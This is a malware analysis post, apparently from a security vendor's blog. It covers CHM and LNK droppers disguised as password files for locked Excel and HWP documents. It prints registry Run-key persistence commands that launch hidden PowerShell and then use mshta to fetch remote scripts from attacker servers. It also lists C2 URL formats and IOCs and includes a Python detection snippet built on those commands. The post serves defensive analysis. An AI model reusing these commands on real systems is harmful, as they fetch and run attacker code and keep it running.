Malware Distributed Disguised as a Password File

AhnLab Security Emergency response Center (ASEC) discovered a malware strain disguised as a password file and being distributed alongside a normal file within a compressed file last month. It is difficult for users to notice that this file is malicious because it is distributed together with a normal file. The recently discovered malware was in CHM and LNK file formats. The CHM file is of the same type as the malware covered in the post below and is assumed to have been created by the same threat group.

It is believed that the CHM and LNK files are distributed while compressed together with a normal, password-locked file. Users are led to execute the CHM or LNK files since they appear as if they hold the passwords for the password-protected Excel and HWP files.

Figure 1. Inside the compressed files

While the two types were distributed in the same format, the malicious behaviors ultimately executed suggest that they were created by different groups.

  • CHM Type

Executing passwd.chm or Password.chm, as shown in Figure 1, displays the password to the locked file and simultaneously triggers the execution of the malicious script they contain.

Figure 2. Help screen displayed when passwd.chm is executed

Figure 3. Contents of Shoes.xlsx that is displayed upon unlocking the file

Figure 4. Help screen displayed when Password.chm is executed

Figure 5. Contents of 2020_normal_ko.hwp that is displayed upon unlocking the file

Below is an example of the malicious script found in the CHM files. Using the mshta process, it triggers the execution of an additional script that exists within a malicious URL.

Figure 6. Malicious script within the CHM file

The additional script run through the mshta process is in the same format as the command shared in the post <CHM Malware Disguised as Security Email from a Korean Financial Company: RedEyes(ScarCruft)>. This script is responsible for registering to the RUN key, receiving commands from the threat actor’s server, and transmitting the command execution results.

Figure 7. Malicious script found within 1.html

  • RUN key registration
    Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value name: icxrNpVd
    Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc.kr/skin/product/1.html
  • C2
    Receives threat actor’s commands – hxxp://shacc[.]kr/skin/product/mid.php?U=[Computer Name]+[Username]
    Transmits command execution results – hxxp://shacc[.]kr/skin/product/mid.php?R=[Base64-encoded]

Figure 8. Malicious script found within 11.html

  • RUN key registration
    Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value name: aeF
    Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 496433 2.2.2.2 || mshta hxxp://141.105.65.165/data/11.html
  • C2
    Receives threat actor’s commands – hxxp://141.105.65.165/data//mid.php?U=[Computer Name]+[Username]
    Transmits command execution results – hxxp://141.105.65.165/data/mid.php?R=[Base64-encoded]
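As an added example (not code from the ASEC post), the following Python checks Run-key values and requested URLs against the persistence pattern and the mid.php check-in format listed above; the sample inputs are constructed from the values in this post, and the function names are hypothetical.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Run-key value shape described above: cmd.exe starts a hidden PowerShell that runs
# "ping -n 1 -w <ms> 2.2.2.2 || mshta <url>". The ping to an unreachable address is
# only a delay; because it fails, "||" then runs mshta to fetch the remote script.
RUN_VALUE_RE = re.compile(
    r"cmd\.exe\s+/c\s+powershell\.exe.*?-ep\s+bypass\s+"
    r"ping\s+-n\s+1\s+-w\s+(?P<wait_ms>\d+)\s+(?P<ping_ip>[\d.]+)\s*\|\|\s*"
    r"mshta\s+(?P<url>\S+)",
    re.IGNORECASE,
)

def check_run_value(name, value):
    """Return a finding for a Run-key value matching the pattern, else None."""
    m = RUN_VALUE_RE.search(value)
    if not m:
        return None
    return {"value_name": name, "wait_ms": int(m.group("wait_ms")),
            "ping_target": m.group("ping_ip"), "mshta_url": m.group("url")}

def check_c2_url(url):
    """Classify a requested URL against the mid.php?U=... / mid.php?R=... format."""
    parts = urlsplit(url)
    if not parts.path.endswith("/mid.php"):
        return None
    qs = parse_qs(parts.query)
    if "U" in qs:  # beacon: U=<computer name>+<user name>; '+' decodes to a space
        return {"type": "beacon", "host": parts.netloc, "identity": qs["U"][0]}
    raw = re.search(r"(?:^|&)R=([^&]*)", parts.query)  # result: R=<Base64>
    if not raw:
        return None
    try:  # read R raw so a '+' inside the Base64 is not turned into a space
        decoded = base64.b64decode(raw.group(1), validate=True).decode("utf-8", "replace")
    except binascii.Error:
        decoded = None
    return {"type": "result", "host": parts.netloc, "decoded": decoded}

# Constructed sample input modelled on this post ("hxxp" kept as written there).
SAMPLE_RUN_VALUES = {
    "icxrNpVd": "c:\\windows\\system32\\cmd.exe /c PowerShell.exe -WindowStyle hidden "
                "-NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 "
                "|| mshta hxxp://shacc.kr/skin/product/1.html",
    "OneDrive": "C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background",
}
SAMPLE_URLS = [
    "hxxp://shacc.kr/skin/product/mid.php?U=DESKTOP-TEST+user",
    "hxxp://141.105.65.165/data//mid.php?R=aGVsbG8=",  # Base64 of "hello", constructed
]
```

Run-key values come from `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` (e.g. via `winreg` or a registry export), and the URL check is meant for proxy or DNS/HTTP logs.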

  • LNK Type

The password.txt.lnk file shown in Figure 1 creates a text file containing the password and the malicious script file in the %temp% folder when executed.

Figure 9. Additional script and password.txt file that is created

Figure 10. Contents of PersonalDataUseAgreement.hwp that is displayed upon unlocking the file

As shown below, the VBS file is responsible for running the additional malicious script that exists within hxxp://hondes.getenjoyment[.]net/denak/info/list.php?query=1.

Figure 11. Created VBS file

Looking at the URL format, the LNK type is the same as the malware covered in the post below, which leads the team to believe that it was created by the same threat group.

Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers)

This type of malware can perform a variety of malicious behaviors according to the threat actor’s intentions. Furthermore, since various other threat groups are utilizing this method of distributing malware alongside a normal file, the team predicts there are other forms of this malware aside from the CHM and LNK files that have already been confirmed. As shown above, various forms of malware are being distributed to Korean users, so users are advised to always check the sender of the emails they receive and be especially cautious about opening attached files.

[File Detection]
Trojan/CHM.Agent (2023.03.08.03)
Dropper/LNK.Agent (2023.02.28.00)

[IOC]
MD5
809528921de39530de59e3793d74af98 – CHM
b39182a535f41699280ca088eef0f258 – CHM
2b79e2bd6548118c942480a52b5a1669 – LNK

C2
hxxp://shacc.kr/skin/product/1.html
hxxp://141.105.65.165/data/11.html
hxxp://hondes.getenjoyment.net/denak/info/list.php?query=1



Article Link: Malware Distributed Disguised as a Password File - ASEC BLOG